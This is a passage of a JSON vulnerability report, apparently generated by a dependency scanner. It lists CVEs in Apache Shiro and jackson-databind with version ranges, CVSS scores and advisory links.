default)."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.12.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/mdv7ftz7k4488rzloxo2fb0p9shnp9wm"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46749"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46749"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.12.0"]}],"title":"CVE-2023-46749/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11619"]}],"cve":"CVE-2020-11619","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:44","ids":[{"system_name":"CVE Record","text":"CVE-2020-11619"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"NetApp Advisory","text":"ntap-20200511-0004"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11619"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11619"},{"summary":"NetApp Advisory ntap-20200511-0004","url":"https://security.netapp.com/advisory/ntap-20200511-0004"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11619/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-25649"]}],"cve":"CVE-2020-25649","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2021-02-18T20:51:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-25649"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210108-0007"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1887664"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"XML External Entity (XXE) Injection in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# XML External Entity (XXE) Injection in Jackson Databind A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0.0|<2.9.10.7"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.7"]},"references":[{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1887664"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-25649"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-25649"},{"summary":"NetApp Advisory ntap-20210108-0007","url":"https://security.netapp.com/advisory/ntap-20210108-0007"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0.0|<2.9.10.7"]}],"title":"CVE-2020-25649/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-8840"]}],"cve":"CVE-2020-8840","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-03-04T20:52:14","ids":[{"system_name":"CVE Record","text":"CVE-2020-8840"},{"system_name":"Oracle Advisory","text":"cpuapr2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Huawei Advisory","text":"huawei-sa-20200610-01-fastjason-en"},{"system_name":"NetApp Advisory","text":"ntap-20200327-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in jackson-databind FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.3"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.3"]},"references":[{"summary":"Huawei Advisory huawei-sa-20200610-01-fastjason-en","url":"http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8840"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8840"},{"summary":"NetApp Advisory ntap-20200327-0002","url":"https://security.netapp.com/advisory/ntap-20200327-0002"},{"summary":"Oracle Advisory cpuapr2020","url":"https://www.oracle.com/security-alerts/cpuapr2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.3"]}],"title":"CVE-2020-8840/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36518"]}],"cve":"CVE-2020-36518","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-03-12T00:00:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-36518"},{"system_name":"Oracle 